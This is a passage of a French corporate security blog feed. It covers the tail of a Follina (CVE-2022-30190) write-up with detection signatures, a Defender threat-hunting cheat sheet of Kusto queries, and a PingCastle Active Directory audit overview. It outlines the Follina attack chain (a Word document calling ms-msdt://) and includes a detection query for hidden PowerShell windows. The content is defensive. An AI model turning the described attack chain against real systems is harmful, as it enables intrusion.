<p>Ce que fait le fichier <strong>rgb.exe</strong> ne nous intéresse pas forcément, mais l'élément important à retenir c'est qu'il s'agit réellement d'une nouvelle technique d'accès initial (<a target="_blank" href="https://attack.mitre.org/tactics/TA0001/">MITRE TA0001</a>) qui permet à un attaquant d'exécuter du code en un seul click (voir moins).</p>
<p>Ce vecteur d'attaque est intéressant, car il utilise un document Word sans Macro pour déclencher des signes habituels de Warning aux utilisateurs, mais avec la possibilité d'exécuter du code à distance. Voici un résumé de la stratégie de l'attaquant :</p>
<ul>
<li>Création d'un Word avec un lien vers un objet externe malicieux grâce au fichier <strong>word/_rels/document.xml.rels</strong></li>
</ul>
<ul>
<li>Le fichier malicieux sert à appeler ms-msdt:// en lui passant des paramètres malicieux qui permettront d'exécuter du code sur la victime.</li>
</ul>
<h1 id="heading-detection-et-prevention">Détection et prévention</h1>
<p>CISEL propose des solutions EPP et EDR délivrées avec Microsoft Defender ou Kaspersky. Ces deux solutions sont capables de détecter et de bloquer la majorité des attaques exploitant la vulnérabilité Follina.</p>
<p><strong>Microsoft Defender Antivirus (MDAV)</strong> possède les signatures suivantes :</p>
<ul>
<li><p>Trojan:Win32/Mesdetty.A</p>
</li>
<li><p>Trojan:Win32/Mesdetty.B</p>
</li>
<li><p>Behavior:Win32/MesdettyLaunch.A!blk</p>
</li>
<li><p>Trojan:Win32/MesdettyScript.A</p>
</li>
<li><p>Trojan:Win32/MesdettyScript.B</p>
</li>
</ul>
<p>Il faut simplement s'assurer que le module <strong>Cloud-delivered protection and automatic sample submission</strong> est activé.</p>
<p>Pour les clients ayant la version EDR de Microsoft (Microsoft Defender for Endpoint), les alertes suivantes sont remontées:</p>
<ul>
<li><p>Suspicious behavior by an Office application</p>
</li>
<li><p>Suspicious behavior by Msdt.exe</p>
</li>
</ul>
<p>Une règle ASR nommée <strong>Block all Office applications from creating child processes</strong> permet de bloquer la création de processus enfant par une application Office telle que Word.</p>
<p><strong>Kaspersky Security for Endpoint</strong> détecte et bloque également les tentatives d'exploitation avec les signatures suivantes :</p>
<ul>
<li><p>PDM:Exploit.Win32.Generic</p>
</li>
<li><p>HEUR:Exploit.MSOffice.Agent.n</p>
</li>
<li><p>HEUR:Exploit.MSOffice.Agent.gen</p>
</li>
<li><p>HEUR:Exploit.MSOffice.CVE-2017-0199.a</p>
</li>
<li><p>HEUR:Exploit.MSOffice.CVE-2021-40444.a</p>
</li>
<li><p>HEUR:Exploit.MSOffice.Generic</p>
</li>
</ul>
<h1 id="heading-references">Références</h1>
<ul>
<li><p>https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-30190</p>
</li>
<li><p>https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/</p>
</li>
</ul>
<h1 id="heading-a-propos-de-lauteur">A propos de l'auteur</h1>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1655806418420/m2bxwTKxT.png?height=250" alt="imageedit_2_2965616244.png" class="image--center mx-auto" /></p>
<p><a target="_blank" href="https://www.linkedin.com/in/cyrillgremaud/"><strong>Cyrill Gremaud</strong></a><em>Security Solutions Architect @</em> <a target="_blank" href="https://www.dina.ch">Dina | The Swiss IT Company</a></p>
]]></content:encoded></item><item><title><![CDATA[Microsoft Defender for Endpoint - Threat Hunting Cheat Sheet]]></title><description><![CDATA[Les personnes utilisant la solution Microsoft Defender for Endpoint bénéficient d'un module dédié à la recherche de menace très performant, Advanced Hunting.
Threat Hunting - Kesako ?
Le Threat Hunting est une technique qui consiste à rechercher proa...]]></description><link>https://security.dina.ch/microsoft-defender-for-endpoint-threat-hunting-cheat-sheet</link><guid isPermaLink="true">https://security.dina.ch/microsoft-defender-for-endpoint-threat-hunting-cheat-sheet</guid><category><![CDATA[threat]]></category><category><![CDATA[Threat Hunting]]></category><category><![CDATA[Microsoft Defender]]></category><category><![CDATA[EDR]]></category><dc:creator><![CDATA[Cyrill Gremaud]]></dc:creator><pubDate>Mon, 27 Jun 2022 11:00:35 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/unsplash/qAjJk-un3BI/upload/v1655812533097/csIUX9VSH.jpeg" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>Les personnes utilisant la solution Microsoft Defender for Endpoint bénéficient d'un module dédié à la recherche de menace très performant, <em>Advanced Hunting</em>.</p>
<h1 id="heading-threat-hunting-kesako">Threat Hunting - Kesako ?</h1>
<p>Le Threat Hunting est une technique qui consiste à rechercher proactivement des cybermenaces qui sont présentes dans un réseau mais n’ont pas encore été détectées. Cela est particulièrement utile pour mener des investigations lorsqu'on soupçonne une attaque ou que l'on désire faire une levée de doute.</p>
<p>Grâce à une analyse approfondie, il est possible d'identifier des éventuels IOC (<em>Indicators of Compromise</em>) qui prouveraient que nous avons été victime d'une cyber-attaque.</p>
<h1 id="heading-chez-cisel-ca-se-passe-comment">Chez CISEL, ça se passe comment ?</h1>
<p>Grâce à notre service <em>Managed Endpoint Protection</em> qui inclut une couche EDR en complément de l'EPP traditionnel, nos clients bénéficient d'une protection en temps réel, mais également d'une meilleure réponse à incident grâce à l'EDR qui offre les outils nécessaires pour investiguer de manière proactive ou alors réactive suite à une suspicion d'incident.</p>
<h1 id="heading-registre-des-requetes">Registre des requêtes</h1>
<p>Avec plus de 2'000 postes de travail et serveurs sous gestion, les équipes opérationnelles de CISEL ont l'habitude d'utiliser le module de <em>Threat Hunting</em> de Microsoft Defender for Endpoint pour identifier des IOC. Les chapitres ci-dessous listent les requêtes les plus utiles. Le langage utilisé est <a target="_blank" href="https://docs.microsoft.com/en-us/azure/data-explorer/kusto/query/"><strong>Kusto (KLQ)</strong></a></p>
<p>Abonnez-vous au blog pour recevoir les updates concernant cet article !</p>
<h3 id="heading-detect-hidden-powershell-windows">Detect Hidden PowerShell Windows</h3>
<p>Les fenêtres PowerShell cachées sont souvent des indicateurs précieux, car il n'y a en principe pas de raison de cacher ce type de fenêtre. Les logiciels malveillants aiment cacher ce genre de fenêtre.</p>
<pre><code class="lang-plaintext">// Finds all PowerShell execution events wherein the PowerShell window has been explicitly hidden.
DeviceProcessEvents
| where Timestamp &gt; ago(7d)
| where InitiatingProcessFileName =~ "powershell.exe"
| where InitiatingProcessCommandLine has "-Command"
| where InitiatingProcessCommandLine has "-w hidden" or InitiatingProcessCommandLine has "-windowstyle hidden"
| project Timestamp, DeviceName, InitiatingProcessCommandLine
| top 100 by Timestamp
</code></pre>
<h3 id="heading-log4shell-identification">Log4Shell Identification</h3>
<p>Dans le cas du fameux Log4Shell, une des difficultés pour l'IT était d'identifier <strong>rapidement</strong> quelles applications utilisaient la librairie log4j. Cette requête peut grandement aider.</p>
<pre><code class="lang-plaintext">// Find software that use log4j library
DeviceTvmSoftwareInventory
| where SoftwareName contains "log4j"
| project DeviceName, SoftwareName, SoftwareVersion
</code></pre>
<h3 id="heading-cve-vulnerable-software">CVE vulnerable software</h3>
<p>Dans la majorité des cas, une vulnérabilité est associée à un numéro spécifique de CVE. Il est possible d'utiliser ce numéro de CVE pour identifier les applications vulnérables.</p>
<pre><code class="lang-plaintext">//Software vulnerable to specific CVE
DeviceTvmSoftwareVulnerabilities
| where CveId contains "CVE-2021-44228"
| distinct DeviceName, OSPlatform, SoftwareVendor, SoftwareName, SoftwareVersion
</code></pre>
<h3 id="heading-detecting-specific-outgoing-connexion">Detecting specific outgoing connexion</h3>
<p>Dans le cas de certaines attaques, certains IOC sont connus et sans solution centralisée, il est impossible de connaître quels équipements ont établi une connexion sortante vers des IP spécifiques. Cette requête permet d'identifier quel équipement et quel processus en question a établi une connexion sortante.</p>
<pre><code class="lang-plaintext">//List all device who made outgoing connection to specific IP
DeviceNetworkEvents
| where RemoteIP in~ (  "8.8.8.8", "1.1.1.1" )
| where Timestamp &gt; ago(15d)
| project Timestamp, DeviceName, RemoteIP, RemotePort, Protocol, InitiatingProcessFileName
</code></pre>
<h1 id="heading-a-propos-de-lauteur">A propos de l'auteur</h1>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1655806418420/m2bxwTKxT.png?height=250" alt="imageedit_2_2965616244.png" class="image--center mx-auto" /></p>
<p><a target="_blank" href="https://www.linkedin.com/in/cyrillgremaud/"><strong>Cyrill Gremaud</strong></a><em>Security Solutions Architect @</em> <a target="_blank" href="https://www.dina.ch">Dina | The Swiss IT Company</a></p>
]]></content:encoded></item><item><title><![CDATA[Active Directory Auditing with Ping Castle]]></title><description><![CDATA[L'audit d'un Active Directory Microsoft peut se révéler très complexe et l'un des risques est de ne pas prendre en compte tous les paramètres.
Ping Castle offre une méthodologie complète des outils pour couvrir le spectre complet d'un AD Microsoft. S...]]></description><link>https://security.dina.ch/active-directory-auditing-with-ping-castle</link><guid isPermaLink="true">https://security.dina.ch/active-directory-auditing-with-ping-castle</guid><category><![CDATA[audit]]></category><category><![CDATA[Security]]></category><category><![CDATA[Active Directory]]></category><category><![CDATA[PingCastle]]></category><dc:creator><![CDATA[Cyrill Gremaud]]></dc:creator><pubDate>Mon, 27 Jun 2022 10:56:12 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/unsplash/pypeCEaJeZY/upload/v1655895945602/aBS-JPs2W.jpeg" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>L'audit d'un Active Directory Microsoft peut se révéler très complexe et l'un des risques est de ne pas prendre en compte tous les paramètres.</p>
<p><a target="_blank" href="https://pingcastle.com/">Ping Castle</a> offre une méthodologie complète des outils pour couvrir le spectre complet d'un AD Microsoft. Son avantage est d'être libre et donc de pouvoir valider le code simplement.</p>
<p>Cet article va se concentrer sur la fonctionnalité principale <strong>Healthcheck</strong></p>
<p>L'installation est très simple et il suffit d'avoir un système d'exploitation Windows, un compte de domaine (domain User ) et de décompresser le fichier pour exécuter le programme</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1655885843072/wO85SOYq2.png" alt="image.png" /></p>
<h2 id="heading-healthcheck">Healthcheck</h2>
<p>Ce type d'audit permet de connaître rapidement l'état de santé d'un Active Directory en fournissant un rapport sous forme HTML (Web) ou PDF</p>
<h3 id="heading-indicators">Indicators</h3>
<p>Basé sur 4 indicateurs, cette section offre une vue globale des éléments qui composent ce rapport.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1655886629409/99loYuldH.png" alt="image.png" /></p>
<ul>
<li><p><strong>Stale Object</strong>: représente tout ce qui concerne les objets (création d'ordinateurs et d'utilisateurs, délégation) AD et leur cycle de vie</p>
</li>
<li><p><strong>Privileged Accounts</strong>: concerne les administrateurs du domaine, par exemple mot de passe d'un compte administrateur domaine qui date de plus de 3 ans</p>
</li>
<li><p><strong>Trusts</strong>: si plusieurs domaines sont liés ensemble, cet indice va permettre de connaître les liens entre eux</p>
</li>
<li><p><strong>Anomalies</strong>: tout ce qui ne rentre pas dans les catégories précédentes. Par exemple, les processus de contrôle de sécurité</p>
</li>
</ul>
<h3 id="heading-risk-model">Risk model</h3>
<p>La modélisation des risques est très utile pour connaître les menaces actuelles de l'Active Directory</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1655894120666/fxMoHTX4d.png" alt="image.png" /></p>
<p>La mesure associée peut être obtenue en cliquant sur le risque détecté</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1655894337535/XVVfinUdo.png" alt="image.png" /></p>
<h3 id="heading-maturity-level">Maturity Level</h3>
<p>Ce niveau permet de connaître les mauvaises configurations et ce qu'il faut corriger pour atteindre un niveau correct</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1655894748660/Z7BXRRpZz.png" alt="image.png" /></p>
<h3 id="heading-mitre-attampck">MITRE ATT&amp;CK®</h3>
<p>Cette section est évaluée selon la base de connaissance <a target="_blank" href="https://attack.mitre.org/">MITRE ATT&amp;CK®</a> pour identifier les failles présentes sur le système</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1655895018203/nUtxuz1DG.png" alt="image.png" /></p>
<p>Un élément intéressant est la partie mitigation qui permet savoir comment corriger les vulnérabilités</p>
<h2 id="heading-outil-indispensable">Outil indispensable ?</h2>
<p>Ping Castle est un produit intéressant pour les audits de sécurité car il permet d'obtenir une vision complète de l'état d'un Active Directory et apporte des éléments de correction. Un niveau de détail très précis est mis à disposition afin de connaître réellement quelles sont les vulnérabilités présentes sur le système et des pistes pour les corriger dans le but d'aider les administrateurs à protéger leur AD</p>
<h1 id="heading-references">Références</h1>
<ul>
<li>https://pingcastle.com/</li>
</ul>
<h1 id="heading-a-propos-de-lauteur">A propos de l'auteur</h1>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1655897142510/Wc-INzmQz.png" alt="1615489106864-modified.png" class="image--center mx-auto" /></p>
<p><a target="_blank" href="https://www.linkedin.com/in/sven-rouvinez/"><strong>Sven Rouvinez</strong></a> <em>Network and Security Engineer @</em> <a target="_blank" href="https://www.dina.ch">Dina | The Swiss IT Company</a></p>
]]></content:encoded></item></channel></rss>